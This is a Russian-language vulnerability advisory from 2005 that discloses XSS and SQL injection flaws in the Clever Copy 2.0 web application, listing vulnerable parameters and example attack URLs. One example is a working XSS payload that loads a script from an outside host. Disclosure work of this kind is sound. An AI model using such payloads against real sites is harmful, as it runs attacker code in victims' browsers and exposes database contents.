Security Lab

Межсайтовый скриптинг и SQL-инъекция в Clever Copy

Дата публикации:18.07.2005
Всего просмотров:1279
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2005-2324
CVE-2005-2325
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие важных данных
Раскрытие системных данных
Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Clever Copy 2.x
Уязвимые версии: Clever Copy 2.0, 2.0a

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует при обработке входных данных в переменных 'viewuser_id' и 'group' сценария 'users.php' и при обработке параметра yr в сценарии 'calendar.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/forum/users.php?mode=
viewprofile&viewuser_id=89[XSS-code]

http://[target]/forum/users.php?mode=
viewgroup&group=Moderators[XSS-code]

http://[target]/calendar.php?mth=3&yr=2006"><script
src="http://www.drorshalev.com/dev/injection/js.js"></sc ript>

2. Программное обеспечение некорректно обрабатывает входные данные в некоторых переменных. Удаленный пользователь может с специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Примеры:

http://[target]/forum/viewattach.php?
id=[SQL-Inje ction]

http://[target]/forum/users.php?mode=
viewprofile&viewuser_id=[SQL-Injection]

http://[target]/forum/viewforum.php?mode=
view&id=[SQL-Injection]

http://[targ et]/forum/viewforum.php?
forum=[SQL-Injection]

URL производителя: clevercopy.bestdirectbuy.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: class-1 Forum Software Cross site scripting & Clever Copy XSS
Clever copy 'calendar.php' 'yr' variable cross site scripting